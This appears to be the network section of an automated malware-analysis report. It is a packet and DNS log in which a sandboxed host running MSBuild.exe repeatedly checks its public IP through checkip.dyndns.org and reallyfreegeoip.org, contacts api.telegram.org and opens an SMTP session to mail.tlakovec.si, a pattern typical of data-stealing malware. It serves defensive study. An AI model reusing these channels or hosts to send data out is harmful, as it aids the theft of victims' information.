                                                                                                              Nov 7, 2024 12:49:08.002554893 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:08.007134914 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.007294893 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.007392883 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:08.013300896 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.016717911 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.065757036 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:08.122999907 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.133168936 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.133323908 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:08.133490086 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.140799999 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.141083002 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:08.644323111 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.648875952 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:08.653700113 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.797954082 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.847174883 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:08.893269062 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:08.893317938 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.893410921 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:08.906167984 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:08.906183958 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:09.524358034 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:09.524449110 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:09.529299021 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:09.529309034 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:09.529721975 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:09.581593990 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:09.718275070 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:09.763329983 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:09.855595112 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:09.855715036 CET44349714188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:09.855858088 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:09.966368914 CET49714443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:10.022247076 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:10.027123928 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.184925079 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.213299036 CET49716443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:10.213340044 CET44349716188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.213406086 CET49716443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:10.213748932 CET49716443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:10.213762999 CET44349716188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.237782001 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:10.817327023 CET44349716188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.819863081 CET49716443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:10.819894075 CET44349716188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.966236115 CET44349716188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.966339111 CET44349716188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.966501951 CET49716443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:10.966964960 CET49716443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:10.970150948 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:10.971333981 CET4971780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:10.975250959 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.975325108 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:10.976123095 CET8049717158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:10.976201057 CET4971780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:10.976272106 CET4971780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:10.981076002 CET8049717158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:11.606470108 CET8049717158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:11.607809067 CET49719443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:11.607840061 CET44349719188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:11.608042002 CET49719443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:11.608377934 CET49719443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:11.608395100 CET44349719188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:11.612802982 CET49673443192.168.2.12173.222.162.60
                                                                                                              Nov 7, 2024 12:49:11.612809896 CET49674443192.168.2.12173.222.162.60
                                                                                                              Nov 7, 2024 12:49:11.659673929 CET4971780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:12.050314903 CET49672443192.168.2.12173.222.162.60
                                                                                                              Nov 7, 2024 12:49:12.205281019 CET44349719188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:12.207067966 CET49719443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:12.207087040 CET44349719188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:12.344639063 CET44349719188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:12.344747066 CET44349719188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:12.344832897 CET49719443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:12.345263958 CET49719443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:12.349922895 CET4972080192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:12.354821920 CET8049720158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:12.354963064 CET4972080192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:12.355129004 CET4972080192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:12.359889984 CET8049720158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.009958029 CET8049720158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.011199951 CET49722443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:13.011250019 CET44349722188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.011382103 CET49722443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:13.011651039 CET49722443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:13.011667967 CET44349722188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.050312042 CET4972080192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:13.620625973 CET44349722188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.624699116 CET49722443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:13.624741077 CET44349722188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.763036966 CET44349722188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.763164043 CET44349722188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.763253927 CET49722443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:13.763889074 CET49722443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:13.767168999 CET4972080192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:13.768184900 CET4972380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:13.772470951 CET8049720158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.773017883 CET8049723158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.773088932 CET4972080192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:13.773119926 CET4972380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:13.773189068 CET4972380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:13.777977943 CET8049723158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.813344002 CET44349708173.222.162.60192.168.2.12
                                                                                                              Nov 7, 2024 12:49:13.813461065 CET49708443192.168.2.12173.222.162.60
                                                                                                              Nov 7, 2024 12:49:14.423204899 CET8049723158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:14.424624920 CET49724443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:14.424665928 CET44349724188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:14.424736023 CET49724443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:14.424968958 CET49724443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:14.424978971 CET44349724188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:14.472194910 CET4972380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:15.041439056 CET44349724188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.043602943 CET49724443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:15.043625116 CET44349724188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.186438084 CET44349724188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.186530113 CET44349724188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.186598063 CET49724443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:15.187402010 CET49724443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:15.191173077 CET4972380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:15.192677975 CET4972580192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:15.196502924 CET8049723158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.196576118 CET4972380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:15.197633982 CET8049725158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.197753906 CET4972580192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:15.197859049 CET4972580192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:15.202635050 CET8049725158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.875992060 CET8049725158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.877376080 CET49726443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:15.877418995 CET44349726188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.877494097 CET49726443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:15.877722979 CET49726443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:15.877734900 CET44349726188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:15.925302982 CET4972580192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:16.657057047 CET44349726188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:16.690702915 CET49726443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:16.690740108 CET44349726188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:16.833065987 CET44349726188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:16.833163023 CET44349726188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:16.833233118 CET49726443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:16.840431929 CET49726443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:16.972009897 CET4972580192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:16.977930069 CET8049725158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:16.979089022 CET4972580192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:17.047033072 CET4972780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:17.052202940 CET8049727158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:17.052274942 CET4972780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:17.052427053 CET4972780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:17.058057070 CET8049727158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:17.709129095 CET8049727158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:17.710758924 CET49728443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:17.710808992 CET44349728188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:17.710922956 CET49728443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:17.711182117 CET49728443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:17.711199045 CET44349728188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:17.753552914 CET4972780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:18.326724052 CET44349728188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:18.328444958 CET49728443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:18.328469992 CET44349728188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:18.471463919 CET44349728188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:18.471569061 CET44349728188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:18.471653938 CET49728443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:18.472347021 CET49728443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:18.475630999 CET4972780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:18.476660967 CET4972980192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:18.480741024 CET8049727158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:18.480860949 CET4972780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:18.481491089 CET8049729158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:18.481575012 CET4972980192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:18.481693983 CET4972980192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:18.486403942 CET8049729158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.117049932 CET8049729158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.127331018 CET49730443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:19.127372980 CET44349730188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.127453089 CET49730443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:19.127748966 CET49730443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:19.127758980 CET44349730188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.159708023 CET4972980192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:19.724330902 CET44349730188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.726183891 CET49730443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:19.726208925 CET44349730188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.864650965 CET44349730188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.864746094 CET44349730188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.864869118 CET49730443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:19.865317106 CET49730443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:19.868041992 CET4972980192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:19.869081020 CET4973180192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:19.873393059 CET8049729158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.873486042 CET4972980192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:19.873893976 CET8049731158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:19.873960972 CET4973180192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:19.874064922 CET4973180192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:19.879002094 CET8049731158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:20.514695883 CET8049731158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:20.516161919 CET49732443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:20.516210079 CET44349732188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:20.516380072 CET49732443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:20.516556025 CET49732443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:20.516566992 CET44349732188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:20.565932989 CET4973180192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:21.111352921 CET44349732188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:21.113229990 CET49732443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:21.113259077 CET44349732188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:21.254955053 CET44349732188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:21.255048037 CET44349732188.114.96.3192.168.2.12
                                                                                                              Nov 7, 2024 12:49:21.255110979 CET49732443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:21.255615950 CET49732443192.168.2.12188.114.96.3
                                                                                                              Nov 7, 2024 12:49:21.267704010 CET4973180192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:21.272795916 CET8049731158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:21.272861004 CET4973180192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:21.275731087 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:21.275774002 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:21.275837898 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:21.276272058 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:21.276283979 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:22.106400967 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:22.106533051 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:22.108628988 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:22.108642101 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:22.108932018 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:22.110342026 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:22.155347109 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:22.375513077 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:22.375577927 CET44349733149.154.167.220192.168.2.12
                                                                                                              Nov 7, 2024 12:49:22.375665903 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:22.381452084 CET49733443192.168.2.12149.154.167.220
                                                                                                              Nov 7, 2024 12:49:27.618525982 CET4971780192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:27.856184006 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:27.865034103 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:27.868618965 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:29.313038111 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:29.313397884 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:29.318680048 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:29.576176882 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:29.576847076 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:29.581777096 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:29.839657068 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:29.840074062 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:29.844943047 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:30.143505096 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:30.143800974 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:30.148647070 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:30.406229973 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:30.415463924 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:30.420361996 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:30.688939095 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:30.689158916 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:30.694025993 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.224680901 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.225303888 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.225379944 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:31.226130009 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:31.226197004 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:31.226219893 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:31.226243973 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:49:31.231029987 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.231041908 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.231071949 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.231096029 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.506182909 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:49:31.550343990 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:50:38.139206886 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:50:38.139425993 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:50:38.139875889 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:50:38.140033960 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:50:38.144258976 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:51:07.816234112 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:51:07.821296930 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:51:08.280977011 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:51:08.281076908 CET49741587192.168.2.12212.44.112.138
                                                                                                              Nov 7, 2024 12:51:08.286395073 CET58749741212.44.112.138192.168.2.12
                                                                                                              Nov 7, 2024 12:51:08.286454916 CET49741587192.168.2.12212.44.112.138
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 7, 2024 12:49:07.966604948 CET6552953192.168.2.121.1.1.1
                                                                                                              Nov 7, 2024 12:49:07.974148035 CET53655291.1.1.1192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.880259037 CET4984553192.168.2.121.1.1.1
                                                                                                              Nov 7, 2024 12:49:08.887878895 CET53498451.1.1.1192.168.2.12
                                                                                                              Nov 7, 2024 12:49:21.268287897 CET5284953192.168.2.121.1.1.1
                                                                                                              Nov 7, 2024 12:49:21.275122881 CET53528491.1.1.1192.168.2.12
                                                                                                              Nov 7, 2024 12:49:27.792509079 CET5164853192.168.2.121.1.1.1
                                                                                                              Nov 7, 2024 12:49:27.847837925 CET53516481.1.1.1192.168.2.12
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Nov 7, 2024 12:49:07.966604948 CET192.168.2.121.1.1.10x50acStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:08.880259037 CET192.168.2.121.1.1.10x2637Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:21.268287897 CET192.168.2.121.1.1.10xad64Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:27.792509079 CET192.168.2.121.1.1.10x1152Standard query (0)mail.tlakovec.siA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Nov 7, 2024 12:49:07.974148035 CET1.1.1.1192.168.2.120x50acNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:07.974148035 CET1.1.1.1192.168.2.120x50acNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:07.974148035 CET1.1.1.1192.168.2.120x50acNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:07.974148035 CET1.1.1.1192.168.2.120x50acNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:07.974148035 CET1.1.1.1192.168.2.120x50acNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:07.974148035 CET1.1.1.1192.168.2.120x50acNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:08.887878895 CET1.1.1.1192.168.2.120x2637No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:08.887878895 CET1.1.1.1192.168.2.120x2637No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:21.275122881 CET1.1.1.1192.168.2.120xad64No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:22.751629114 CET1.1.1.1192.168.2.120x6786No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:22.751629114 CET1.1.1.1192.168.2.120x6786No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:23.407455921 CET1.1.1.1192.168.2.120x9850No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:23.407455921 CET1.1.1.1192.168.2.120x9850No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                              Nov 7, 2024 12:49:27.847837925 CET1.1.1.1192.168.2.120x1152No error (0)mail.tlakovec.si212.44.112.138A (IP address)IN (0x0001)false
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.1249713158.101.44.242801016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
